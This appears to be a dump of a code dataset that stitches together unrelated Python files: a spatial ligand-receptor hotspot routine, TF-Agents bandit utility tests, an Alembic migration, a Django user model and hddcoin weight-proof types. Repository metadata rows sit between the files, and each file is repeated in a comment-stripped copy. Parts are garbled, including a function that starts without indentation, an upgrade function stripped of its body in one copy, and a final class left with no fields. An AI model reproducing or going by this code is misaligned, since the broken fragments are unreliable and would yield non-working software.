coors = adata.obs[["imagerow", "imagecol"]].values
lr_summary, lr_hot_scores = hotspot_core(
lr_scores, lrs, coors, eps, quantile, plot_diagnostics, adata
)
if plot_diagnostics and show_plot: plt.show()
if verbose:
print("Clustering LRs to help with ranking/interpretation...")
clusterer = AgglomerativeClustering(
affinity="euclidean", linkage="ward", distance_threshold=10, n_clusters=None
)
clusterer.fit(lr_hot_scores > 0)
dist_cutoff = np.quantile(clusterer.distances_, 0.98)
clusterer = AgglomerativeClustering(
affinity="euclidean",
linkage="ward",
distance_threshold=dist_cutoff,
n_clusters=None,
)
clusters = clusterer.fit_predict(lr_hot_scores > 0)
cluster_set = np.unique(clusters)
if verbose:
print("Ranking LRs...")
cluster_mean_spots = []
for cluster in cluster_set:
cluster_bool = clusters == cluster
cluster_mean_spots.append(np.mean(lr_summary[cluster_bool, 2]))
cluster_order = np.argsort(-np.array(cluster_mean_spots))
lr_order = []
new_clusters = []
cluster_scores = np.zeros((adata.shape[0], len(cluster_set)))
for i, index in enumerate(cluster_order):
cluster = cluster_set[index]
cluster_indices = np.where(clusters == cluster)[0]
lr_order_ = np.argsort(-lr_summary[cluster_indices, 2])
lr_order.extend(cluster_indices[lr_order_])
new_clusters += [i] * len(cluster_indices)
cluster_scores[:, i] = lr_hot_scores[cluster_indices, :].mean(axis=0)
if verbose:
print("Saving results:")
lrs = lrs[lr_order]
lr_summary = lr_summary[lr_order, :]
lr_summary[:, 3] = new_clusters
lr_summary = pd.DataFrame(
lr_summary,
index=lrs,
columns=["spot_counts", "cutoff", "hotspot_counts", "lr_cluster"],
)
lr_scores = lr_scores[lr_order, :].transpose()
lr_hot_scores = lr_hot_scores[lr_order, :].transpose()
adata.uns["lr_summary"] = lr_summary
adata.obsm["lr_scores"] = lr_scores
adata.obsm["lr_hot_scores"] = lr_hot_scores
adata.obsm["cluster_scores"] = cluster_scores
if verbose:
print(f"\tSummary values of lrs in adata.uns['lr_summary'].")
print(
f"\tMatrix of lr scores in same order as the summary in adata.obsm['lr_scores']."
)
print(f"\tMatrix of the hotspot scores in adata.obsm['lr_hot_scores'].")
print(
f"\tMatrix of the mean LR cluster scores in adata.obsm['cluster_scores']."
)
def hotspot_core(
    lr_scores,
    lrs,
    coors,
    eps,
    quantile,
    plot_diagnostics=False,
    adata=None,
    verbose=True,
    max_score=False,
):
    """Strip background signal from per-LR score vectors.

    NOTE: this copy was corrupted by automated comment stripping (the
    ``plot_diagnostics`` guard and the ``lr_quantiles``/``lr_mean_scores``
    assignments were lost, leaving a dangling ``, score_copy)`` fragment);
    restored here from the intact primary copy of the function.

    For each LR pair, candidate cutoffs are taken at the non-zero score
    quantiles; spots above each cutoff are clustered spatially with DBSCAN
    and the cutoff maximising ``n_clusters * mean_spot_score**2`` is kept.
    Scores below the chosen cutoff are zeroed.

    Returns
    -------
    lr_summary: (n_lrs, 4) array with columns
        [spot_counts, cutoff (or best score if ``max_score``),
         hotspot_counts, lr_cluster]; the last column is filled by the caller.
    lr_hot_scores: copy of ``lr_scores`` with sub-cutoff entries zeroed.
    """
    score_copy = lr_scores.copy()  # work on a copy; caller keeps raw scores
    quantiles = [quantile * i for i in range(int(1 / quantile))]
    lr_hot_scores = np.zeros(score_copy.shape)
    # cols: spot_counts, cutoff, hotspot_counts, lr_cluster
    lr_summary = np.zeros((score_copy.shape[0], 4))
    # Group LR pairs by quantiles of their mean score for diagnostics.
    if plot_diagnostics:
        lr_quantiles = [(i / 6) for i in range(1, 7)][::-1]
        lr_mean_scores = np.apply_along_axis(non_zero_mean, 1, score_copy)
        lr_quant_values = np.quantile(lr_mean_scores, lr_quantiles)
        quant_lrs = np.array(
            [lrs[lr_mean_scores == quant] for quant in lr_quant_values]
        )
        fig, axes = plt.subplots(6, 4, figsize=(20, 15))
    # Determine per-LR hotspot cutoffs.
    with tqdm(
        total=len(lrs),
        desc="Removing background lr scores...",
        bar_format="{l_bar}{bar}",
        disable=verbose == False,
    ) as pbar:
        for i, lr_ in enumerate(lrs):
            lr_score_ = score_copy[i, :]  # view: mutated in place below
            lr_summary[i, 0] = len(np.where(lr_score_ > 0)[0])
            cutoff_scores = []
            cutoffs = np.quantile(lr_score_[lr_score_ > 0], quantiles)
            for cutoff in cutoffs:
                spot_bool = lr_score_ >= cutoff
                if len(np.where(spot_bool)[0]) == 0:
                    cutoff_scores.append(0)
                    continue
                coor_ = coors[spot_bool, :]
                clusters = DBSCAN(
                    min_samples=2, eps=eps, metric="manhattan"
                ).fit_predict(coor_)
                # Reward both many spatial clusters and high surviving scores.
                score = len(np.unique(clusters)) * (np.mean(lr_score_[spot_bool])) ** 2
                cutoff_scores.append(score)
            # Cutoff at which the clustering score is maximised.
            best_cutoff = cutoffs[np.argmax(cutoff_scores)]
            if not max_score:
                lr_summary[i, 1] = best_cutoff
            else:
                lr_summary[i, 1] = cutoff_scores[np.argmax(cutoff_scores)]
            lr_score_[lr_score_ < best_cutoff] = 0
            lr_hot_scores[i, :] = lr_score_
            lr_summary[i, 2] = len(np.where(lr_score_ > 0)[0])
            if plot_diagnostics and lr_ in quant_lrs and type(adata) != type(None):
                add_diagnostic_plots(
                    adata,
                    i,
                    lr_,
                    quant_lrs,
                    lr_quantiles,
                    lr_scores,
                    lr_hot_scores,
                    axes,
                    cutoffs,
                    cutoff_scores,
                    best_cutoff,
                )
            pbar.update(1)
    return lr_summary, lr_hot_scores
def non_zero_mean(vals):
    """Average of the positive values in ``vals``, ignoring zeros."""
    return np.mean(vals[vals > 0])
def add_diagnostic_plots(
adata,
i,
lr_,
quant_lrs,
lr_quantiles,
lr_scores,
lr_hot_scores,
axes,
cutoffs,
n_clusters,
best_cutoff,
):
q_i = np.where(quant_lrs == lr_)[0][0]
axes[q_i][0].scatter(cutoffs, n_clusters)
axes[q_i][0].set_title(f"n_clusts*mean_spot_score vs cutoff")
axes[q_i][0].set_xlabel("cutoffs")
axes[q_i][0].set_ylabel("n_clusts*mean_spot_score")
scores_ = lr_scores[i, :]
sb.distplot(
scores_[scores_ > 0],
ax=axes[q_i][1],
hist=True,
kde=False,
color="red",
norm_hist=True,
)
v_height = 0.5
axes[q_i][1].vlines(best_cutoff, 0, v_height)
axes[q_i][1].text(best_cutoff, v_height, str(round(best_cutoff, 2)))
axes[q_i][1].set_title(f"Distrib {round(lr_quantiles[q_i], 2)}({lr_})")
adata.obsm["lr_scores"] = scores_
het_plot(
adata,
use_het="lr_scores",
ax=axes[q_i][2],
show_color_bar=False,
)
axes[q_i][2].set_title("scores")
adata.obsm["lr_scores"] = lr_hot_scores[i, :]
het_plot(
adata,
use_het="lr_scores",
ax=axes[q_i][3],
show_color_bar=False,
)
axes[q_i][3].set_title("hotspot scores")
| true | true |
f725e6deed60db8da5ead0d23368ad990e104030 | 5,821 | py | Python | tf_agents/bandits/agents/utils_test.py | MarkDaoust/agents | 00ddf75a8a35a26a03a9323b78d95c06211b5b3f | [
"Apache-2.0"
] | null | null | null | tf_agents/bandits/agents/utils_test.py | MarkDaoust/agents | 00ddf75a8a35a26a03a9323b78d95c06211b5b3f | [
"Apache-2.0"
] | null | null | null | tf_agents/bandits/agents/utils_test.py | MarkDaoust/agents | 00ddf75a8a35a26a03a9323b78d95c06211b5b3f | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tf_agents.bandits.agents.utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
import tensorflow_probability as tfp
from tf_agents.bandits.agents import utils
from tf_agents.specs import tensor_spec
tfd = tfp.distributions
tf.compat.v1.enable_v2_behavior()
def test_cases():
    """Shared (batch_size, context_dim) parameterizations for the tests below."""
    cases = [
        {
            'testcase_name': '_batch1_contextdim10',
            'batch_size': 1,
            'context_dim': 10,
        },
        {
            'testcase_name': '_batch4_contextdim5',
            'batch_size': 4,
            'context_dim': 5,
        },
    ]
    return parameterized.named_parameters(*cases)
class UtilsTest(tf.test.TestCase, parameterized.TestCase):
    """Unit tests for the bandit agent utility helpers."""

    def testNumActionsFromTensorSpecGoodSpec(self):
        # A bounded scalar int spec with maximum 15 encodes 16 actions (0..15).
        action_spec = tensor_spec.BoundedTensorSpec(
            dtype=tf.int32, shape=(), minimum=0, maximum=15)
        num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
        self.assertEqual(num_actions, 16)

    def testNumActionsFromTensorSpecWrongRank(self):
        # Non-scalar action specs must be rejected with a ValueError.
        action_spec = tensor_spec.BoundedTensorSpec(
            dtype=tf.int32, shape=(2, 3), minimum=0, maximum=15)
        with self.assertRaisesRegexp(ValueError, r'Action spec must be a scalar'):
            utils.get_num_actions_from_tensor_spec(action_spec)

    @test_cases()
    def testBUpdate(self, batch_size, context_dim):
        # sum_reward_weighted_observations should equal sum_t r_t * x_t.
        b_array = np.array(range(context_dim))
        r_array = np.array(range(batch_size)).reshape((batch_size, 1))
        x_array = np.array(range(batch_size * context_dim)).reshape(
            (batch_size, context_dim))
        rx = r_array * x_array
        expected_b_updated_array = b_array + np.sum(rx, axis=0)
        b = tf.constant(b_array, dtype=tf.float32, shape=[context_dim])
        r = tf.constant(r_array, dtype=tf.float32, shape=[batch_size])
        x = tf.constant(x_array, dtype=tf.float32, shape=[batch_size, context_dim])
        b_update = utils.sum_reward_weighted_observations(r, x)
        self.assertAllClose(expected_b_updated_array, self.evaluate(b + b_update))

    @test_cases()
    def testBUpdateEmptyObservations(self, batch_size, context_dim):
        # With an empty batch the update must be all zeros (no contribution).
        r = tf.constant([], dtype=tf.float32, shape=[0, 1])
        x = tf.constant([], dtype=tf.float32, shape=[0, context_dim])
        b_update = utils.sum_reward_weighted_observations(r, x)
        expected_b_update_array = np.zeros([context_dim], dtype=np.float32)
        self.assertAllClose(expected_b_update_array, self.evaluate(b_update))

    def testLaplacian1D(self):
        action_spec = tensor_spec.BoundedTensorSpec(
            dtype=tf.int32, shape=(), minimum=0, maximum=4)
        num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
        laplacian_matrix = tf.convert_to_tensor(
            utils.build_laplacian_over_ordinal_integer_actions(action_spec),
            dtype=tf.float32)
        res = tf.matmul(
            laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
        # The vector of ones is in the null space of the Laplacian matrix.
        self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
        # The row sum is zero.
        row_sum = tf.reduce_sum(laplacian_matrix, 1)
        self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
        # The column sum is zero.
        column_sum = tf.reduce_sum(laplacian_matrix, 0)
        self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
        # Interior nodes of the path graph have degree 2 on the diagonal.
        self.assertAllClose(2.0, laplacian_matrix[1, 1])
        # Exact expected Laplacian of the 5-node path graph 0-1-2-3-4.
        laplacian_matrix_expected = np.array(
            [[1.0, -1.0, 0.0, 0.0, 0.0],
             [-1.0, 2.0, -1.0, 0.0, 0.0],
             [0.0, -1.0, 2.0, -1.0, 0.0],
             [0.0, 0.0, -1.0, 2.0, -1.0],
             [0.0, 0.0, 0.0, -1.0, 1.0]])
        self.assertAllClose(laplacian_matrix_expected,
                            self.evaluate(laplacian_matrix))

    def testComputePairwiseDistances(self):
        # Hand-computed squared Euclidean distances between the three rows.
        input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
        pdist_matrix = np.array(
            [[0.0, 27.0, 108.0,],
             [27.0, 0.0, 27.0],
             [108.0, 27.0, 0.0]])
        tf_dist_matrix = utils.compute_pairwise_distances(
            tf.constant(input_vects, dtype=tf.float32))
        self.assertAllClose(pdist_matrix, self.evaluate(tf_dist_matrix))

    def testBuildLaplacianNearestNeighborGraph(self):
        input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9],
                                [10, 11, 12], [13, 14, 15]])
        num_actions = input_vects.shape[0]
        laplacian_matrix = utils.build_laplacian_nearest_neighbor_graph(
            tf.constant(input_vects, dtype=tf.float32), k=2)
        # The vector of ones is in the null space of the Laplacian matrix.
        res = tf.matmul(
            laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
        self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
        # The row sum is zero.
        row_sum = tf.reduce_sum(laplacian_matrix, 1)
        self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
        # The column sum is zero.
        column_sum = tf.reduce_sum(laplacian_matrix, 0)
        self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
        # Endpoint has degree 2, middle node degree 4 in the 2-NN graph.
        self.assertAllClose(2.0, laplacian_matrix[0, 0])
        self.assertAllClose(4.0, laplacian_matrix[2, 2])
if __name__ == '__main__':
    # Run the tests via the TensorFlow test runner.
    tf.test.main()
| 38.045752 | 79 | 0.695585 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tf_agents.bandits.agents import utils
from tf_agents.specs import tensor_spec
tfd = tfp.distributions
tf.compat.v1.enable_v2_behavior()
def test_cases():
return parameterized.named_parameters(
{
'testcase_name': '_batch1_contextdim10',
'batch_size': 1,
'context_dim': 10,
}, {
'testcase_name': '_batch4_contextdim5',
'batch_size': 4,
'context_dim': 5,
})
class UtilsTest(tf.test.TestCase, parameterized.TestCase):
def testNumActionsFromTensorSpecGoodSpec(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=15)
num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
self.assertEqual(num_actions, 16)
def testNumActionsFromTensorSpecWrongRank(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(2, 3), minimum=0, maximum=15)
with self.assertRaisesRegexp(ValueError, r'Action spec must be a scalar'):
utils.get_num_actions_from_tensor_spec(action_spec)
@test_cases()
def testBUpdate(self, batch_size, context_dim):
b_array = np.array(range(context_dim))
r_array = np.array(range(batch_size)).reshape((batch_size, 1))
x_array = np.array(range(batch_size * context_dim)).reshape(
(batch_size, context_dim))
rx = r_array * x_array
expected_b_updated_array = b_array + np.sum(rx, axis=0)
b = tf.constant(b_array, dtype=tf.float32, shape=[context_dim])
r = tf.constant(r_array, dtype=tf.float32, shape=[batch_size])
x = tf.constant(x_array, dtype=tf.float32, shape=[batch_size, context_dim])
b_update = utils.sum_reward_weighted_observations(r, x)
self.assertAllClose(expected_b_updated_array, self.evaluate(b + b_update))
@test_cases()
def testBUpdateEmptyObservations(self, batch_size, context_dim):
r = tf.constant([], dtype=tf.float32, shape=[0, 1])
x = tf.constant([], dtype=tf.float32, shape=[0, context_dim])
b_update = utils.sum_reward_weighted_observations(r, x)
expected_b_update_array = np.zeros([context_dim], dtype=np.float32)
self.assertAllClose(expected_b_update_array, self.evaluate(b_update))
def testLaplacian1D(self):
action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=4)
num_actions = utils.get_num_actions_from_tensor_spec(action_spec)
laplacian_matrix = tf.convert_to_tensor(
utils.build_laplacian_over_ordinal_integer_actions(action_spec),
dtype=tf.float32)
res = tf.matmul(
laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
row_sum = tf.reduce_sum(laplacian_matrix, 1)
self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
column_sum = tf.reduce_sum(laplacian_matrix, 0)
self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
self.assertAllClose(2.0, laplacian_matrix[1, 1])
laplacian_matrix_expected = np.array(
[[1.0, -1.0, 0.0, 0.0, 0.0],
[-1.0, 2.0, -1.0, 0.0, 0.0],
[0.0, -1.0, 2.0, -1.0, 0.0],
[0.0, 0.0, -1.0, 2.0, -1.0],
[0.0, 0.0, 0.0, -1.0, 1.0]])
self.assertAllClose(laplacian_matrix_expected,
self.evaluate(laplacian_matrix))
def testComputePairwiseDistances(self):
input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
pdist_matrix = np.array(
[[0.0, 27.0, 108.0,],
[27.0, 0.0, 27.0],
[108.0, 27.0, 0.0]])
tf_dist_matrix = utils.compute_pairwise_distances(
tf.constant(input_vects, dtype=tf.float32))
self.assertAllClose(pdist_matrix, self.evaluate(tf_dist_matrix))
def testBuildLaplacianNearestNeighborGraph(self):
input_vects = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9],
[10, 11, 12], [13, 14, 15]])
num_actions = input_vects.shape[0]
laplacian_matrix = utils.build_laplacian_nearest_neighbor_graph(
tf.constant(input_vects, dtype=tf.float32), k=2)
res = tf.matmul(
laplacian_matrix, tf.ones([num_actions, 1], dtype=tf.float32))
self.assertAllClose(0.0, self.evaluate(tf.norm(res)))
row_sum = tf.reduce_sum(laplacian_matrix, 1)
self.assertAllClose(0.0, self.evaluate(tf.norm(row_sum)))
column_sum = tf.reduce_sum(laplacian_matrix, 0)
self.assertAllClose(0.0, self.evaluate(tf.norm(column_sum)))
self.assertAllClose(2.0, laplacian_matrix[0, 0])
self.assertAllClose(4.0, laplacian_matrix[2, 2])
if __name__ == '__main__':
tf.test.main()
| true | true |
f725e6fdee776868b7306032eb1649135fbb2a82 | 1,471 | py | Python | migrations/versions/5bc9e9b6c3ff_unify_local_and_remote_int8.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 23 | 2022-03-17T12:24:09.000Z | 2022-03-31T09:13:30.000Z | migrations/versions/5bc9e9b6c3ff_unify_local_and_remote_int8.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 18 | 2022-03-21T08:17:44.000Z | 2022-03-30T12:42:30.000Z | migrations/versions/5bc9e9b6c3ff_unify_local_and_remote_int8.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 16 | 2022-03-17T12:24:14.000Z | 2022-03-31T12:15:12.000Z | """Unify local and remote int8
Revision ID: 5bc9e9b6c3ff
Revises: 7f3c818591e1
Create Date: 2021-03-29 15:28:58.945918
"""
"""
OpenVINO DL Workbench
Migration: Unify local and remote int8
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5bc9e9b6c3ff'
down_revision = '7f3c818591e1'
branch_labels = None
depends_on = None
def upgrade():
    """Create the join table linking int8 calibration script-creation jobs
    to the base ``jobs`` table (one row per job; PK doubles as FK)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('create_int8_calibration_scripts_jobs',
                    sa.Column('job_id', sa.Integer(), nullable=False),
                    sa.ForeignKeyConstraint(['job_id'], ['jobs.job_id'], ),
                    sa.PrimaryKeyConstraint('job_id')
                    )
    # ### end Alembic commands ###
def downgrade():
    """Reverse the migration: drop the int8-calibration jobs join table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('create_int8_calibration_scripts_jobs')
    # ### end Alembic commands ###
| 28.843137 | 73 | 0.734194 |
from alembic import op
import sqlalchemy as sa
revision = '5bc9e9b6c3ff'
down_revision = '7f3c818591e1'
branch_labels = None
depends_on = None
def upgrade():
    """Create the join table linking int8 calibration script-creation jobs
    to the base ``jobs`` table.

    NOTE: this copy was corrupted by automated comment stripping, which left
    only a dangling ``sa.PrimaryKeyConstraint(...)`` and a stray ``)``;
    restored here from the intact primary copy of the migration.
    """
    op.create_table('create_int8_calibration_scripts_jobs',
                    sa.Column('job_id', sa.Integer(), nullable=False),
                    sa.ForeignKeyConstraint(['job_id'], ['jobs.job_id'], ),
                    sa.PrimaryKeyConstraint('job_id')
                    )
| true | true |
f725e78ae37c1db3941ba4ddd91efca669d47928 | 1,424 | py | Python | backend/users/models.py | crowdbotics-apps/flightlevel36zero-31803 | 6c81d2e9394440810c1a5561752a452619388c10 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/users/models.py | crowdbotics-apps/flightlevel36zero-31803 | 6c81d2e9394440810c1a5561752a452619388c10 | [
"FTL",
"AML",
"RSA-MD"
] | 38 | 2021-09-11T01:00:31.000Z | 2021-12-05T17:43:03.000Z | backend/users/models.py | crowdbotics-apps/natures-cornucopia-30308 | 847053dad41bda7122bc15710e0e9e2bf89d6882 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
class User(AbstractUser):
    # WARNING!
    """
    Some officially supported features of Crowdbotics Dashboard depend on the initial
    state of this User model (Such as the creation of superusers using the CLI
    or password reset in the dashboard). Changing, extending, or modifying this model
    may lead to unexpected bugs and or behaviors in the automated flows provided
    by Crowdbotics. Change it at your own risk.

    This model represents the User instance of the system, login system and
    everything that relates with an `User` is represented by this model.
    """

    # Display name; optional. NOTE(review): ``email``, ``first_name`` and
    # ``last_name`` below shadow AbstractUser's built-in fields with
    # nullable variants -- presumably intentional, confirm before changing.
    name = models.CharField(
        null=True,
        blank=True,
        max_length=255,
    )
    email = models.EmailField(
        null=True,
        blank=True,
        max_length=255,
    )
    first_name = models.CharField(
        null=True,
        blank=True,
        max_length=255,
    )
    last_name = models.CharField(
        null=True,
        blank=True,
        max_length=255,
    )
    # Set once when the row is created (auto_now_add).
    timestamp_created = models.DateTimeField(
        null=True,
        blank=True,
        auto_now_add=True,
    )
    # Refreshed on every save (auto_now).
    last_updated = models.DateTimeField(
        null=True,
        blank=True,
        auto_now=True,
    )
| 27.921569 | 85 | 0.665028 | from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
class User(AbstractUser):
name = models.CharField(
null=True,
blank=True,
max_length=255,
)
email = models.EmailField(
null=True,
blank=True,
max_length=255,
)
first_name = models.CharField(
null=True,
blank=True,
max_length=255,
)
last_name = models.CharField(
null=True,
blank=True,
max_length=255,
)
timestamp_created = models.DateTimeField(
null=True,
blank=True,
auto_now_add=True,
)
last_updated = models.DateTimeField(
null=True,
blank=True,
auto_now=True,
)
| true | true |
f725e948ab21699d629dd278dd83cd81a9a7c910 | 3,205 | py | Python | hddcoin/types/weight_proof.py | JakubSido/hddcoin-blockchain | 7b9da03edee3512295c0f142c07c4759512ccbca | [
"Apache-2.0"
] | 37 | 2021-07-08T23:42:01.000Z | 2022-03-26T21:30:10.000Z | hddcoin/types/weight_proof.py | JakubSido/hddcoin-blockchain | 7b9da03edee3512295c0f142c07c4759512ccbca | [
"Apache-2.0"
] | 13 | 2021-07-11T15:12:01.000Z | 2022-03-15T08:36:18.000Z | hddcoin/types/weight_proof.py | JakubSido/hddcoin-blockchain | 7b9da03edee3512295c0f142c07c4759512ccbca | [
"Apache-2.0"
] | 19 | 2021-07-10T14:09:07.000Z | 2022-03-14T11:17:05.000Z | from dataclasses import dataclass
from typing import List, Optional
from hddcoin.types.blockchain_format.proof_of_space import ProofOfSpace
from hddcoin.types.blockchain_format.reward_chain_block import RewardChainBlock
from hddcoin.types.blockchain_format.sized_bytes import bytes32
from hddcoin.types.blockchain_format.vdf import VDFInfo, VDFProof
from hddcoin.types.end_of_slot_bundle import EndOfSubSlotBundle
from hddcoin.types.header_block import HeaderBlock
from hddcoin.util.ints import uint8, uint32, uint64, uint128
from hddcoin.util.streamable import Streamable, streamable
@dataclass(frozen=True)
@streamable
class SubEpochData(Streamable):
    """Per-sub-epoch summary embedded in a weight proof."""

    reward_chain_hash: bytes32
    num_blocks_overflow: uint8
    # Present only when the corresponding parameter changed this sub-epoch.
    new_sub_slot_iters: Optional[uint64]
    new_difficulty: Optional[uint64]


# number of challenge blocks
# Average iters for challenge blocks
# |--A-R----R-------R--------R------R----R----------R-----R--R---|  Honest difficulty 1000
#                            0.16

# compute total reward chain blocks
# |----------------------------A---------------------------------|  Attackers chain 1000
#                            0.48
# total number of challenge blocks == total number of reward chain blocks


@dataclass(frozen=True)
@streamable
class SubSlotData(Streamable):
    """One sub-slot of a challenge segment; fields are populated differently
    depending on whether a block was infused in this sub-slot."""

    # if infused
    proof_of_space: Optional[ProofOfSpace]
    # VDF to signage point
    cc_signage_point: Optional[VDFProof]
    # VDF from signage to infusion point
    cc_infusion_point: Optional[VDFProof]
    icc_infusion_point: Optional[VDFProof]
    cc_sp_vdf_info: Optional[VDFInfo]
    signage_point_index: Optional[uint8]
    # VDF from beginning to end of slot if not infused
    # from ip to end if infused
    cc_slot_end: Optional[VDFProof]
    icc_slot_end: Optional[VDFProof]
    # info from finished slots
    cc_slot_end_info: Optional[VDFInfo]
    icc_slot_end_info: Optional[VDFInfo]
    cc_ip_vdf_info: Optional[VDFInfo]
    icc_ip_vdf_info: Optional[VDFInfo]
    total_iters: Optional[uint128]

    def is_challenge(self) -> bool:
        """True when this sub-slot carries an infused challenge block
        (signalled by the presence of a proof of space)."""
        if self.proof_of_space is not None:
            return True
        return False

    def is_end_of_slot(self) -> bool:
        """True when this sub-slot records a finished (non-infused) slot,
        signalled by the end-of-slot VDF info being present."""
        if self.cc_slot_end_info is not None:
            return True
        return False


@dataclass(frozen=True)
@streamable
class SubEpochChallengeSegment(Streamable):
    """A contiguous run of sub-slots belonging to one sub-epoch."""

    sub_epoch_n: uint32
    sub_slots: List[SubSlotData]
    rc_slot_end_info: Optional[VDFInfo]  # in first segment of each sub_epoch


@dataclass(frozen=True)
@streamable
# this is used only for serialization to database
class SubEpochSegments(Streamable):
    challenge_segments: List[SubEpochChallengeSegment]


@dataclass(frozen=True)
@streamable
# this is used only for serialization to database
class RecentChainData(Streamable):
    recent_chain_data: List[HeaderBlock]


@dataclass(frozen=True)
@streamable
class ProofBlockHeader(Streamable):
    """Minimal header needed to verify a block inside a weight proof."""

    finished_sub_slots: List[EndOfSubSlotBundle]
    reward_chain_block: RewardChainBlock


@dataclass(frozen=True)
@streamable
class WeightProof(Streamable):
    """Top-level weight proof: sub-epoch summaries, sampled challenge
    segments and the recent chain tail."""

    sub_epochs: List[SubEpochData]
    sub_epoch_segments: List[SubEpochChallengeSegment]  # sampled sub epoch
    recent_chain_data: List[HeaderBlock]
| 31.116505 | 95 | 0.737285 | from dataclasses import dataclass
from typing import List, Optional
from hddcoin.types.blockchain_format.proof_of_space import ProofOfSpace
from hddcoin.types.blockchain_format.reward_chain_block import RewardChainBlock
from hddcoin.types.blockchain_format.sized_bytes import bytes32
from hddcoin.types.blockchain_format.vdf import VDFInfo, VDFProof
from hddcoin.types.end_of_slot_bundle import EndOfSubSlotBundle
from hddcoin.types.header_block import HeaderBlock
from hddcoin.util.ints import uint8, uint32, uint64, uint128
from hddcoin.util.streamable import Streamable, streamable
@dataclass(frozen=True)
@streamable
class SubEpochData(Streamable):
reward_chain_hash: bytes32
num_blocks_overflow: uint8
new_sub_slot_iters: Optional[uint64]
new_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class SubSlotData(Streamable):
    """Per-sub-slot proofs/infos sampled into a weight-proof segment.

    Every field is optional; which fields are populated depends on whether
    the sub-slot carries a challenge (proof_of_space set) or marks the end
    of a slot (cc_slot_end_info set) — see the two predicates below.
    """
    proof_of_space: Optional[ProofOfSpace]
    cc_signage_point: Optional[VDFProof]
    cc_infusion_point: Optional[VDFProof]
    icc_infusion_point: Optional[VDFProof]
    cc_sp_vdf_info: Optional[VDFInfo]
    signage_point_index: Optional[uint8]
    cc_slot_end: Optional[VDFProof]
    icc_slot_end: Optional[VDFProof]
    cc_slot_end_info: Optional[VDFInfo]
    icc_slot_end_info: Optional[VDFInfo]
    cc_ip_vdf_info: Optional[VDFInfo]
    icc_ip_vdf_info: Optional[VDFInfo]
    total_iters: Optional[uint128]
    def is_challenge(self) -> bool:
        """True when this sub-slot carries a challenge (has a proof of space)."""
        # Direct boolean expression instead of if/return True/return False.
        return self.proof_of_space is not None
    def is_end_of_slot(self) -> bool:
        """True when this sub-slot marks the end of a slot."""
        return self.cc_slot_end_info is not None
@dataclass(frozen=True)
@streamable
class SubEpochChallengeSegment(Streamable):
    """One sampled challenge segment belonging to sub-epoch ``sub_epoch_n``."""
    sub_epoch_n: uint32
    sub_slots: List[SubSlotData]
    rc_slot_end_info: Optional[VDFInfo]
@dataclass(frozen=True)
@streamable
# this is used only for serialization to database
class SubEpochSegments(Streamable):
    challenge_segments: List[SubEpochChallengeSegment]
@dataclass(frozen=True)
@streamable
# this is used only for serialization to database
class RecentChainData(Streamable):
    recent_chain_data: List[HeaderBlock]
@dataclass(frozen=True)
@streamable
class ProofBlockHeader(Streamable):
    """Finished sub-slots plus the reward chain block of one header."""
    finished_sub_slots: List[EndOfSubSlotBundle]
    reward_chain_block: RewardChainBlock
@dataclass(frozen=True)
@streamable
class WeightProof(Streamable):
    """A full weight proof: sub-epoch summaries, sampled challenge segments,
    and the recent chain's header blocks."""
